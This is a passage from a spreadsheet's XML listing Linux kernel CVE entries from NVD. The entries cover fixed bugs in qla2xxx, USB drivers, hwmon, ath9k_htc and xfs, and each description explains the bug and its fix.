scsi: qla2xxx: Bound VP index against VP_CTRL IOCB bitmap size
The VP control IOCB selects its target virtual port by setting one bit
in vp_idx_map, a fixed 16-byte (128-bit) array in both
vp_ctrl_entry_24xx and vp_ctrl_entry_24xx_ext. qla25xx_ctrlvp_iocb()
computes map = (vp_index - 1) / 8 and writes vce-&gt;vp_idx_map[map]
without checking that map stays within the array.
max_npiv_vports is taken from firmware and only sanitized to a
MIN_MULTI_ID_FABRIC-aligned boundary, so it can legitimately be 191 or
255, and qla24xx_control_vp() only rejects vp_index &gt;= max_npiv_vports.
A vp_index above 128 therefore yields map &gt;= 16 and an out-of-bounds
write of up to 16 bytes past vp_idx_map, corrupting the trailing IOCB
fields (or the adjacent request-ring slot on the 64-byte layout).
Reject a vp_index that cannot be represented in the IOCB bitmap in
qla24xx_control_vp(), and add a defensive ARRAY_SIZE() guard in
qla25xx_ctrlvp_iocb() before the write. Adapters that report the usual
63 or 127 NPIV vports are unaffected.</t>
        </is>
      </c>
      <c r="T485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97535</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97537</t>
        </is>
      </c>
      <c r="D486" s="5" t="inlineStr"/>
      <c r="E486" s="5" t="inlineStr"/>
      <c r="F486" s="5" t="inlineStr"/>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="inlineStr"/>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr"/>
      <c r="S486" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix queue teardown NULL dma_free and bitmap locking
qla25xx_free_req_que() and qla25xx_free_rsp_que() have two pre-existing
bugs exposed on the error path of qla25xx_create_{req,rsp}_que():
 1. When dma_alloc_coherent() fails during queue creation, the error
    path calls the free function with req-&gt;ring / rsp-&gt;ring still NULL
    (from kzalloc).  The unconditional dma_free_coherent() with a NULL
    cpu_addr is undefined behavior and can panic.
 2. The free functions clear req_qid_map / rsp_qid_map under vport_lock,
    but the create functions protect the same bitmaps with mq_lock.
    This provides no mutual exclusion.  Additionally, the create error
    path clears the bit and releases mq_lock before calling the free
    function, creating a window where another thread can allocate the
    same que_id and have its ha-&gt;req_q_map entry clobbered by the
    subsequent lockless NULL assignment in the free function.
Fix by:
 - Guarding dma_free_coherent() with a NULL check on the ring pointer.
 - Using mq_lock (the lock held by all creators) in the free functions
   to atomically NULL the map entry and clear the bitmap bit.
 - Removing the now-redundant clear_bit blocks from the create error
   paths since the free functions handle it atomically.</t>
        </is>
      </c>
      <c r="T486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97537</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97538</t>
        </is>
      </c>
      <c r="D487" s="5" t="inlineStr"/>
      <c r="E487" s="5" t="inlineStr"/>
      <c r="F487" s="5" t="inlineStr"/>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="inlineStr"/>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr"/>
      <c r="S487" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (asus_rog_ryujin) Validate HID report lengths
rog_ryujin_raw_event() parses response headers and payload fields without
first checking that they are present in the received report. A short report
can therefore make the driver consume uninitialized bytes from the HID
transport buffer and expose them as sensor values through sysfs.
Validate the response header and the fields used by each response type
before parsing them.</t>
        </is>
      </c>
      <c r="T487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97538</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97539</t>
        </is>
      </c>
      <c r="D488" s="5" t="inlineStr"/>
      <c r="E488" s="5" t="inlineStr"/>
      <c r="F488" s="5" t="inlineStr"/>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="inlineStr"/>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr"/>
      <c r="S488" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: xusbatm: don't rely on id table pointer arithmetic
The current code is broken when dynamic ID is involved; in such cases
usb_device_id parameter of probe lives on the heap and the pointer
arithmetic will get an index that is wildly out of bound. xusbatm
initialize the USB device IDs dynamically so it can just use driver_info
too.
Even with conversion, xusbatm still cannot support dynamic IDs, so also set
no_dynamic_id.</t>
        </is>
      </c>
      <c r="T488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97539</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97540</t>
        </is>
      </c>
      <c r="D489" s="5" t="inlineStr"/>
      <c r="E489" s="5" t="inlineStr"/>
      <c r="F489" s="5" t="inlineStr"/>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="inlineStr"/>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr"/>
      <c r="S489" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: usb: pegasus: don't rely on id table pointer arithmetic
The current code is broken when dynamic ID is involved; in such cases
usb_device_id parameter of probe lives on the heap and the pointer
arithmetic will get an index that is wildly out of bound. Instead of
keeping a side table for additional information, use driver_info field of
the usb_device_id.
The dynamic ID parsing code needs to be updated for this; convert it to
just write to the reserved entry for dynamic ID and remove the weird loop.</t>
        </is>
      </c>
      <c r="T489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97540</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97541</t>
        </is>
      </c>
      <c r="D490" s="5" t="inlineStr"/>
      <c r="E490" s="5" t="inlineStr"/>
      <c r="F490" s="5" t="inlineStr"/>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="inlineStr"/>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr"/>
      <c r="S490" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath9k_htc: don't store usb_device_id
usb_device_id is not guaranteed to live longer than probe due to presence
of dynamic ID. All information apart from driver_data can be easily
retrieved from usb_device, so just store driver_data.</t>
        </is>
      </c>
      <c r="T490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97541</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97542</t>
        </is>
      </c>
      <c r="D491" s="5" t="inlineStr"/>
      <c r="E491" s="5" t="inlineStr"/>
      <c r="F491" s="5" t="inlineStr"/>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="inlineStr"/>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr"/>
      <c r="L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr"/>
      <c r="S491" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: bail out on bitmap errors in xrep_agfl_fill
LOLLM also points out that the xagb_bitmap_set call in xrep_agfl_fill
can fail, but we don't check the result of xagb_bitmap_walk, so we
silently drop the error and proceed with inconsistent incore data.
That shouldn't be allowed.</t>
        </is>
      </c>
      <c r="T491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97542</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97543</t>
        </is>
      </c>
      <c r="D492" s="5" t="inlineStr"/>
      <c r="E492" s="5" t="inlineStr"/>
      <c r="F492" s="5" t="inlineStr"/>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="inlineStr"/>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr"/>
      <c r="L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr"/>
      <c r="S492" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: destroy seen inode bitmap when we fail to add a dirpath
LOLLM observes a memory leak in xchk_dirtree_create_path if we create
the directory path object but appending the name to the path fails.
When this happens, we don't tear down the (empty) seen inode bitmap.
This is a pretty trivial error, but let's not leave logic bombs.
Do the same for a similar bug in xrep_dirtree_create_adoption_path.</t>
        </is>
      </c>
      <c r="T492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97543</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97544</t>
        </is>
      </c>
      <c r="D493" s="5" t="inlineStr"/>
      <c r="E493" s="5" t="inlineStr"/>
      <c r="F493" s="5" t="inlineStr"/>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="inlineStr"/>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr"/>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr"/>
      <c r="S493" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: don't leak dqacct if rhashtable insertion fails
LOLLM observes that xqcheck_mod_live_ino_dqtrx doesn't free the newly
allocated dqa object if rhashtable insertion fails.  Fix this leak.</t>
        </is>
      </c>
      <c r="T493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97544</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97545</t>
        </is>
      </c>
      <c r="D494" s="5" t="inlineStr"/>
      <c r="E494" s="5" t="inlineStr"/>
      <c r="F494" s="5" t="inlineStr"/>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="inlineStr"/>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr"/>
      <c r="S494" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: don't leak new_bp if xfs_btree_bload_drop_buf fails
LOLLM observes that in xfs_btree_bload_prep_block,
xfs_btree_bload_drop_buf can hit an IO error if writing the delwri
buffer list to disk fails.  In this case, we fail to release new_bp,
which means we lose a locked buffer.  Fix that.</t>
        </is>
      </c>
      <c r="T494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97545</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97546</t>
        </is>
      </c>
      <c r="D495" s="5" t="inlineStr"/>
      <c r="E495" s="5" t="inlineStr"/>
      <c r="F495" s="5" t="inlineStr"/>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="inlineStr"/>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr"/>
      <c r="S495" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: don't spin forever on zero-length dirents when salvaging them
LOLLM noticed that xrep_dir_recover_data can spin forever if it
encounters an unused dirent that claims to have length zero.  Fix that,
and prevent the same thing from happening with a zero-length entry.</t>
        </is>
      </c>
      <c r="T495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97546</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97547</t>
        </is>
      </c>
      <c r="D496" s="5" t="inlineStr"/>
      <c r="E496" s="5" t="inlineStr"/>
      <c r="F496" s="5" t="inlineStr"/>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="inlineStr"/>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr"/>
      <c r="S496" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: fix exchange-range reflink flag clearing issue with INO1_WRITTEN
When exchanging two full-file ranges, xmi_can_exchange_reflink_flags()
can move the reflink inode flag from the file that currently has it to
the other file, as long as exactly one side is marked.  This assumes
that the file contents, and therefore all shared extents, are exchanged.
That assumption is not true when XFS_EXCHMAPS_INO1_WRITTEN is set.
xfs_exchmaps_can_skip_mapping() can skip hole and unwritten mappings
from file1, so an exchange can complete without moving every mapping
that the earlier flag-swap decision accounted for.  In that case the
post-operation cleanup can clear the reflink flag from an inode that
still owns shared written extents.  Later writes then take the
non-reflink write path and may update blocks that should still have
been protected by CoW, which shows up as data corruption between
reflink-related files.
Fix this by disabling the reflink flag exchange whenever
XFS_EXCHMAPS_INO1_WRITTEN is requested.  The contents exchange can still
proceed; the conservative outcome is that both inodes keep the reflink
flag.  The regular reflink flag cleanup path can drop the extra flag
later once the inode no longer has shared extents.</t>
        </is>
      </c>
      <c r="T496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97547</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97549</t>
        </is>
      </c>
      <c r="D497" s="5" t="inlineStr"/>
      <c r="E497" s="5" t="inlineStr"/>
      <c r="F497" s="5" t="inlineStr"/>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="inlineStr"/>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr"/>
      <c r="S497" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: fix under-reservation of blocks when repairing sf directories
Whilst running QA on XFS for-next as of 7.3-rc2 with MKFS_OPTIONS="-n
size=8192", I observed the following (trimmed) dmesg splat:
 XFS: Assertion failed: args-&gt;total &gt;= dp-&gt;i_nblocks - nblks, file: fs/xfs/libxfs/xfs_da_btree.c, line: 2387
 WARNING: fs/xfs/xfs_message.c:104 at assfail+0x46/0x4a [xfs], CPU#0: xfs_scrub/1426511
 CPU: 0 UID: 0 PID: 1426511 Comm: xfs_scrub Tainted: G        W           7.3.0-rc2-djwx #rc2 PREEMPT(lazy)  6e418570b606a39783b0e7e7b30dc407b965f9e8
 Tainted: [W]=WARN
 RIP: 0010:assfail+0x46/0x4a [xfs]
 RSP: 0018:ffffc900010d7890 EFLAGS: 00010246
 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00000000ffffffd1
 RDX: 0000000000000000 RSI: 0000000000000021 RDI: ffffffffa059fd38
 RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000
 R10: 000000000000000a R11: 000000007fffffff R12: ffffc900010d7940
 R13: ffff888368d8f980 R14: ffffc900010d7a48 R15: ffffc900010d78d0
 FS:  00007f445c5ce680(0000) GS:ffff8884a97ea000(0000) knlGS:0000000000000000
 CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 CR2: 00007f443803b9a8 CR3: 0000000107a4b000 CR4: 00000000003506f0
 Call Trace:
  &lt;TASK&gt;
  xfs_da_grow_inode_int+0x2e0/0x300 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_dir2_grow_inode+0x6e/0x150 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_dir2_sf_to_block+0x149/0x870 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_dir_swap_prep+0xe2/0x110 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_dir_swap+0xfb/0x2f0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_dir_rebuild_tree+0x99/0x100 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_directory+0x83/0x1c0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_attempt+0x4f/0x1e0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_scrub_metadata+0x393/0x5b0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_ioc_scrubv_metadata+0x306/0x570 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_file_ioctl+0xa4f/0x1150 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  __x64_sys_ioctl+0x76/0xc0
  do_syscall_64+0x7a/0x3b0
  entry_SYSCALL_64_after_hwframe+0x4b/0x53
This is a consequence of commit 0fe77e57588b98, which added the
following assertion to xfs_da_grow_inode_int:
 ASSERT(args-&gt;total &gt;= dp-&gt;i_nblocks - nblks);
Tracing this back to xrep_dir_swap_prep, I noticed that the xfs_da_args
object that's passed to xfs_dir2_sf_to_block sets args-&gt;total to 1.
This is incorrect because mkfs set the directory block size to 8k and
the filesystem block size to 4k.  In other words, args-&gt;total should be
2 here, not 1.
Dave Chinner tripped over the same problem with the same branch through
a different channel -- his test setup set the fs block size to 1k, in
which case the directory block size is still set to 4k.  Here,
args-&gt;total should be 4.
Changing the assignment of args-&gt;total to sc-&gt;mp-&gt;m_dir_geo-&gt;fsbcount
makes the assertion go away, but that isn't a complete fix.  In
xrep_tempexch_estimate, we also incorrectly assume that a shortform
conversion requires 1 fsblock when it should be m_dir_geo-&gt;fsbcount.
Without that, we can under-reserve space in the transaction and cause a
filesystem shutdown.
Note that the xfs_dabuf_nfsb helper will compute the correct value for
directories and xattr, so we use that instead of open-coding the logic.
Also fix xrep_xattr_swap_prep to assign args-&gt;total via xfs_dabuf_nfsb
to avoid one logic bomb if we ever support multi-fsblock attrs.
Tripped-by: 0fe77e57588b98 ("xfs: assert the reservation covers each da fork growth")</t>
        </is>
      </c>
      <c r="T497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97549</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97550</t>
        </is>
      </c>
      <c r="D498" s="5" t="inlineStr"/>
      <c r="E498" s="5" t="inlineStr"/>
      <c r="F498" s="5" t="inlineStr"/>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="inlineStr"/>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr"/>
      <c r="S498" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: fix unit conversions in per_binval computation
LOLLM noticed that we're doing the unit conversion in the per_binval
computation backwards -- xfs_buf_inval_log_space's second parameter is
supposed to be in bytes, but max_binval is in units of fsblocks.  Hence
the conversion should be FSB -&gt; B, not the other way around.</t>
        </is>
      </c>
      <c r="T498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97550</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97551</t>
        </is>
      </c>
      <c r="D499" s="5" t="inlineStr"/>
      <c r="E499" s="5" t="inlineStr"/>
      <c r="F499" s="5" t="inlineStr"/>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="inlineStr"/>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr"/>
      <c r="S499" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
